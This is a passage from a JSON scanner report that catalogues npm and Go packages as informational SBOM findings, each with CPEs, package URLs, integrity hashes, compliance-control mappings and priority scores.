"resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz", "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ed6c41b4eae5b77e", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: function-bind 1.1.2", "title": "function-bind 1.1.2", "description": "Package discovered: function-bind 1.1.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "a9db1e71931f56ac", "name": "function-bind", "version": "1.1.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:function-bind:function-bind:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:function-bind:function_bind:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:function_bind:function-bind:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:function_bind:function_bind:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:function:function-bind:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:function:function_bind:1.1.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/function-bind@1.1.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "1567b7d3e95e72e5", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: functional-red-black-tree 1.0.1", "title": "functional-red-black-tree 1.0.1", "description": "Package discovered: functional-red-black-tree 1.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "06c01b9cd08a3446", "name": "functional-red-black-tree", "version": "1.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:functional-red-black-tree:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:functional-red-black-tree:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:functional_red_black_tree:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:functional_red_black_tree:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:functional-red-black:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:functional-red-black:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:functional_red_black:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:functional_red_black:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:functional-red:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:functional-red:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:functional_red:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:functional_red:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:functional:functional-red-black-tree:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:functional:functional_red_black_tree:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/functional-red-black-tree@1.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/functional-red-black-tree/-/functional-red-black-tree-1.0.1.tgz", "integrity": "sha512-dsKNQNdj6xA3T+QlADDA7mOSlX0qiMINjn0cgr+eGHGsbSHzTabcIogz2+p/iqP1Xs6EP/sS2SbqH+brGTbq0g==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "2d3340f07fdb7b3f", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: gaxios 6.7.1", "title": "gaxios 6.7.1", "description": "Package discovered: gaxios 6.7.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "9d900b217a57abee", "name": "gaxios", "version": "6.7.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:gaxios:gaxios:6.7.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/gaxios@6.7.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/gaxios/-/gaxios-6.7.1.tgz", "integrity": "sha512-LDODD4TMYx7XXdpwxAVRAIAuB0bzv0s+ywFonY46k126qzQHT9ygyoa9tncmOiQmmDrik65UYsEkv3lbfqQ3yQ==", "dependencies": { "extend": "^3.0.2", "https-proxy-agent": "^7.0.1", "is-stream": "^2.0.0", "node-fetch": "^2.6.9", "uuid": "^9.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "88029de581a160cb", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: gcp-metadata 6.1.1", "title": "gcp-metadata 6.1.1", "description": "Package discovered: gcp-metadata 6.1.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "aa3886c02ba5c2c5", "name": "gcp-metadata", "version": "6.1.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "Apache-2.0", "spdxExpression": "Apache-2.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:gcp-metadata:gcp-metadata:6.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:gcp-metadata:gcp_metadata:6.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:gcp_metadata:gcp-metadata:6.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:gcp_metadata:gcp_metadata:6.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:gcp:gcp-metadata:6.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:gcp:gcp_metadata:6.1.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/gcp-metadata@6.1.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-6.1.1.tgz", "integrity": "sha512-a4tiq7E0/5fTjxPAaH4jpjkSv/uCaU2p5KC6HVGrvl0cDjA8iBZv4vv1gyzlmK0ZUKqwpOyQMKzZQe3lTit77A==", "dependencies": { "gaxios": "^6.1.1", "google-logging-utils": "^0.0.2", "json-bigint": "^1.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c4a7ba3815d4fc91", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: get-caller-file 2.0.5", "title": "get-caller-file 2.0.5", "description": "Package discovered: get-caller-file 2.0.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "adc0dd4bf4f30c10", "name": "get-caller-file", "version": "2.0.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:get-caller-file:get-caller-file:2.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:get-caller-file:get_caller_file:2.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:get_caller_file:get-caller-file:2.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:get_caller_file:get_caller_file:2.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:get-caller:get-caller-file:2.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:get-caller:get_caller_file:2.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:get_caller:get-caller-file:2.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:get_caller:get_caller_file:2.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:get:get-caller-file:2.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:get:get_caller_file:2.0.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/get-caller-file@2.0.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "fcd2d596421aca4c", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: get-intrinsic 1.3.0", "title": "get-intrinsic 1.3.0", "description": "Package discovered: get-intrinsic 1.3.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "338eac46e71d483e", "name": "get-intrinsic", "version": "1.3.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:get-intrinsic:get-intrinsic:1.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:get-intrinsic:get_intrinsic:1.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:get_intrinsic:get-intrinsic:1.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:get_intrinsic:get_intrinsic:1.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:get:get-intrinsic:1.3.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:get:get_intrinsic:1.3.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/get-intrinsic@1.3.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==", "dependencies": { "call-bind-apply-helpers": "^1.0.2", "es-define-property": "^1.0.1", "es-errors": "^1.3.0", "es-object-atoms": "^1.1.1", "function-bind": "^1.1.2", "get-proto": "^1.0.1", "gopd": "^1.2.0", "has-symbols": "^1.1.0", "hasown": "^2.0.2", "math-intrinsics": "^1.1.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "13f511e3eb23bc5c", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: get-proto 1.0.1", "title": "get-proto 1.0.1", "description": "Package discovered: get-proto 1.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "64572c87855a75b1", "name": "get-proto", "version": "1.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:get-proto:get-proto:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:get-proto:get_proto:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:get_proto:get-proto:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:get_proto:get_proto:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:get:get-proto:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:get:get_proto:1.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/get-proto@1.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz", "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==", "dependencies": { "dunder-proto": "^1.0.1", "es-object-atoms": "^1.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9565869711547f61", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/node_modules/@esbuild/darwin-arm64/bin/esbuild", "startLine": 0 }, "message": "Package discovered: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2", "title": "github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2", "description": "Package discovered: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0b617a8d86aea060", "name": "github.com/evanw/esbuild", "version": "v0.0.0-20240609211631-fc37c2fa9de2", "type": "go-module", "foundBy": "go-module-binary-cataloger", "locations": [ { "path": "/node_modules/@esbuild/darwin-arm64/bin/esbuild", "accessPath": "/node_modules/@esbuild/darwin-arm64/bin/esbuild", "annotations": { "evidence": "primary" } } ], "licenses": [], "language": "go", "cpes": [ { "cpe": "cpe:2.3:a:evanw:esbuild:v0.0.0-20240609211631-fc37c2fa9de2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:golang/github.com/evanw/esbuild@v0.0.0-20240609211631-fc37c2fa9de2", "metadataType": "go-module-buildinfo-entry", "metadata": { "goBuildSettings": [ { "key": "-buildmode", "value": "exe" }, { "key": "-compiler", "value": "gc" }, { "key": "-trimpath", "value": "true" }, { "key": "CGO_ENABLED", "value": "0" }, { "key": "GOARCH", "value": "arm64" }, { "key": "GOOS", "value": "darwin" }, { "key": "vcs", "value": "git" }, { "key": "vcs.revision", "value": "fc37c2fa9de2ad77476a6d4a8f1516196b90187e" }, { "key": "vcs.time", "value": "2024-06-09T21:16:31Z" }, { "key": "vcs.modified", "value": "false" } ], "goCompiledVersion": "go1.20.12", "architecture": "arm64", "mainModule": "github.com/evanw/esbuild", "goCryptoSettings": [ "standard-crypto" ] } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": 